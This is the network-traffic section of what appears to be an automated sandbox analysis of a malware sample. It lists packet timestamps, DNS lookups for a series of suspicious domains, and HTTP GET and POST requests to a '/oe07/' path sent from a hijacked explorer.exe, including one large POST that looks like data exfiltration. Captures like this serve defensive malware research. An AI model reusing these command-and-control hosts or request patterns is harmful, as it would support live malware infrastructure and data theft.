                                                                                                              Aug 22, 2022 20:06:33.309700012 CEST4979280192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:33.491174936 CEST804979235.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:33.491473913 CEST4979280192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:33.672880888 CEST804979235.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:33.673958063 CEST804979235.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:33.674010038 CEST804979235.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:33.674288034 CEST4979280192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:33.674345970 CEST4979280192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:33.855505943 CEST804979235.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:35.678267956 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:35.860966921 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:35.861196995 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.042159081 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.042572021 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.224112988 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224164963 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224196911 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224226952 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224256039 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224287033 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224318027 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.224405050 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.224483013 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.224536896 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.224709988 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.224850893 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.225120068 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.405352116 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.405571938 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.405647993 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.405697107 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.405827999 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.406073093 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.406119108 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.406203032 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406248093 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406259060 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406265974 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406272888 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406452894 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.406594992 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.406635046 CEST804979335.155.7.183192.168.11.20
                                                                                                              Aug 22, 2022 20:06:36.406660080 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406733990 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:36.406744003 CEST4979380192.168.11.2035.155.7.183
                                                                                                              Aug 22, 2022 20:06:54.127445936 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.138194084 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.138403893 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.138475895 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.185533047 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185622931 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185693026 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185741901 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185807943 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185854912 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185900927 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185909986 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.185946941 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.185950994 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.185996056 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.186034918 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.186642885 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.196836948 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.196928978 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.196980000 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.197029114 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.197076082 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.197124004 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.197170019 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.197210073 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:54.197326899 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.197381020 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.197700977 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.197747946 CEST4979480192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:54.208468914 CEST804979464.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.204952955 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.215528965 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.215749025 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.217468977 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.217561007 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.228092909 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228142977 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228199005 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228230000 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228319883 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.228437901 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.228615999 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228627920 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.228687048 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228720903 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228753090 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.228974104 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.229140997 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.229275942 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.229496002 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.239177942 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.239341021 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.239469051 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.239545107 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.239578962 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.239590883 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.239659071 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.239769936 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.240096092 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.240200996 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.240310907 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.240335941 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.240339041 CEST804979564.190.62.22192.168.11.20
                                                                                                              Aug 22, 2022 20:06:56.240344048 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.240351915 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:06:56.240463018 CEST4979580192.168.11.2064.190.62.22
                                                                                                              Aug 22, 2022 20:07:16.404325008 CEST4979780192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:16.415178061 CEST804979745.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:16.415462971 CEST4979780192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:16.415553093 CEST4979780192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:16.426359892 CEST804979745.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:16.427056074 CEST804979745.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:16.427131891 CEST804979745.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:16.427376032 CEST4979780192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:16.427413940 CEST4979780192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:16.438076019 CEST804979745.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.435034037 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.448802948 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.449040890 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.451040030 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.451112032 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.464997053 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465063095 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465101957 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465132952 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465164900 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465194941 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465224981 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465243101 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.465255976 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.465420008 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.465590000 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:18.465852976 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.466000080 CEST804979845.77.55.161192.168.11.20
                                                                                                              Aug 22, 2022 20:07:18.466023922 CEST4979880192.168.11.2045.77.55.161
                                                                                                              Aug 22, 2022 20:07:36.905909061 CEST4979980192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:37.103542089 CEST8049799168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:37.103761911 CEST4979980192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:37.103828907 CEST4979980192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:37.301577091 CEST8049799168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:37.313463926 CEST8049799168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:37.313719034 CEST4979980192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:37.313771009 CEST4979980192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:37.511586905 CEST8049799168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.320945978 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.535579920 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.535801888 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.537555933 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.537640095 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.752224922 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.752294064 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.752435923 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.752444983 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.752557039 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.752733946 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.752840996 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.752943039 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.753089905 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.753163099 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.753268957 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.753442049 CEST4980080192.168.11.20168.206.212.12
                                                                                                              Aug 22, 2022 20:07:39.759219885 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.967067957 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.967515945 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.967775106 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.967845917 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.968203068 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.968595982 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.968640089 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.968784094 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.969119072 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:39.969372988 CEST8049800168.206.212.12192.168.11.20
                                                                                                              Aug 22, 2022 20:07:57.674806118 CEST4980180192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:07:57.831803083 CEST8049801154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:07:57.832089901 CEST4980180192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:07:57.832189083 CEST4980180192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:07:57.990148067 CEST8049801154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:07:57.990519047 CEST4980180192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:07:57.990586042 CEST4980180192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:07:58.148086071 CEST8049801154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.003447056 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.159642935 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.159981012 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.161756992 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.318281889 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.318365097 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.318408966 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.318543911 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.318594933 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.318674088 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.319111109 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.475332022 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.475395918 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.475439072 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.475554943 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.475570917 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.475627899 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.475670099 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.475766897 CEST4980280192.168.11.20154.83.27.102
                                                                                                              Aug 22, 2022 20:08:00.475817919 CEST8049802154.83.27.102192.168.11.20
                                                                                                              Aug 22, 2022 20:08:00.476006985 CEST4980280192.168.11.20154.83.27.102

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Aug 22, 2022 20:02:05.686713934 CEST5861053192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:02:06.188965082 CEST53586101.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:04:06.915476084 CEST6468853192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:04:07.073143959 CEST53646881.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:04:28.081686974 CEST5059053192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:04:28.103261948 CEST53505901.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:04:50.388391018 CEST5964753192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:04:50.761425972 CEST53596471.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:05:10.899630070 CEST5338653192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:05:11.211200953 CEST53533861.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:05:34.407176971 CEST6477653192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:05:34.732363939 CEST53647761.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:05:55.377103090 CEST5702953192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:05:55.421273947 CEST53570291.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:06:13.557677031 CEST5390053192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:06:14.259591103 CEST53539001.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:06:33.100246906 CEST6358153192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:06:33.125502110 CEST53635811.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:06:53.986253977 CEST5405453192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:06:54.126485109 CEST53540541.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:07:16.356599092 CEST5352053192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:07:16.403459072 CEST53535201.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:07:36.586191893 CEST5659153192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:07:36.905170918 CEST53565911.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:07:57.659895897 CEST5032753192.168.11.201.1.1.1
                                                                                                              Aug 22, 2022 20:07:57.674124956 CEST53503271.1.1.1192.168.11.20
                                                                                                              Aug 22, 2022 20:08:38.447535038 CEST6163253192.168.11.201.1.1.1

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Aug 22, 2022 20:02:05.686713934 CEST192.168.11.201.1.1.10xe2d0Standard query (0)proofreading.uzA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:06.915476084 CEST192.168.11.201.1.1.10x54d6Standard query (0)www.meizhuangs.comA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:28.081686974 CEST192.168.11.201.1.1.10x1f4fStandard query (0)www.priorityfirst.infoA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:50.388391018 CEST192.168.11.201.1.1.10x6471Standard query (0)www.qavsrwkg.topA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:05:10.899630070 CEST192.168.11.201.1.1.10x9f49Standard query (0)www.ransbottompottery.comA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:05:34.407176971 CEST192.168.11.201.1.1.10x2c66Standard query (0)www.ransbottompottery.comA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:05:55.377103090 CEST192.168.11.201.1.1.10x9dd3Standard query (0)www.lahustlesharder.netA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:13.557677031 CEST192.168.11.201.1.1.10x850Standard query (0)www.avi3p3g.topA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:33.100246906 CEST192.168.11.201.1.1.10xd788Standard query (0)www.python3.networkA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:53.986253977 CEST192.168.11.201.1.1.10x7aa2Standard query (0)www.b12-overdose.siteA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:07:16.356599092 CEST192.168.11.201.1.1.10x7c3eStandard query (0)www.vivino.appA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:07:36.586191893 CEST192.168.11.201.1.1.10xfa44Standard query (0)www.erinandroger.comA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:07:57.659895897 CEST192.168.11.201.1.1.10x9454Standard query (0)www.www55275.comA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:08:38.447535038 CEST192.168.11.201.1.1.10x39edStandard query (0)www.semimi.xyzA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Aug 22, 2022 20:02:06.188965082 CEST1.1.1.1192.168.11.200xe2d0No error (0)proofreading.uz109.94.209.55A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:07.073143959 CEST1.1.1.1192.168.11.200x54d6No error (0)www.meizhuangs.com166.88.142.63A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:28.103261948 CEST1.1.1.1192.168.11.200x1f4fNo error (0)www.priorityfirst.infopriorityfirst.infoCNAME (Canonical name)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:28.103261948 CEST1.1.1.1192.168.11.200x1f4fNo error (0)priorityfirst.info34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:04:50.761425972 CEST1.1.1.1192.168.11.200x6471Name error (3)www.qavsrwkg.topnonenoneA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:05:11.211200953 CEST1.1.1.1192.168.11.200x9f49No error (0)www.ransbottompottery.com154.201.220.155A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:05:34.732363939 CEST1.1.1.1192.168.11.200x2c66No error (0)www.ransbottompottery.com154.201.220.155A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:05:55.421273947 CEST1.1.1.1192.168.11.200x9dd3Name error (3)www.lahustlesharder.netnonenoneA (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:14.259591103 CEST1.1.1.1192.168.11.200x850No error (0)www.avi3p3g.top45.117.11.104A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:33.125502110 CEST1.1.1.1192.168.11.200xd788No error (0)www.python3.networksixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:33.125502110 CEST1.1.1.1192.168.11.200xd788No error (0)sixie.porkbun.com35.155.7.183A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:54.126485109 CEST1.1.1.1192.168.11.200x7aa2No error (0)www.b12-overdose.siteb12-overdose.siteCNAME (Canonical name)IN (0x0001)
                                                                                                              Aug 22, 2022 20:06:54.126485109 CEST1.1.1.1192.168.11.200x7aa2No error (0)b12-overdose.site64.190.62.22A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:07:16.403459072 CEST1.1.1.1192.168.11.200x7c3eNo error (0)www.vivino.app45.77.55.161A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:07:36.905170918 CEST1.1.1.1192.168.11.200xfa44No error (0)www.erinandroger.com168.206.212.12A (IP address)IN (0x0001)
                                                                                                              Aug 22, 2022 20:07:57.674124956 CEST1.1.1.1192.168.11.200x9454No error (0)www.www55275.com154.83.27.102A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • proofreading.uz
                                                                                                              • www.meizhuangs.com
                                                                                                              • www.priorityfirst.info
                                                                                                              • www.avi3p3g.top
                                                                                                              • www.python3.network
                                                                                                              • www.b12-overdose.site
                                                                                                              • www.vivino.app
                                                                                                              • www.erinandroger.com
                                                                                                              • www.www55275.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.11.2049780109.94.209.55443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.11.2049782166.88.142.6380C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:04:07.235965014 CEST268OUTGET /oe07/?lP=z6AX5nfHP&0HQL9628=VBCkGWN3mbdKL69djJN2rdDlRq/RNi1Yl7kVrt0lw4m93269gBnUi9nT/9PpDwJIl7i8 HTTP/1.1
                                                                                                              Host: www.meizhuangs.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              10192.168.11.204979564.190.62.2280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:06:56.217468977 CEST856OUTPOST /oe07/ HTTP/1.1
                                                                                                              Host: www.b12-overdose.site
                                                                                                              Connection: close
                                                                                                              Content-Length: 245786
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.b12-overdose.site
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.b12-overdose.site/oe07/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
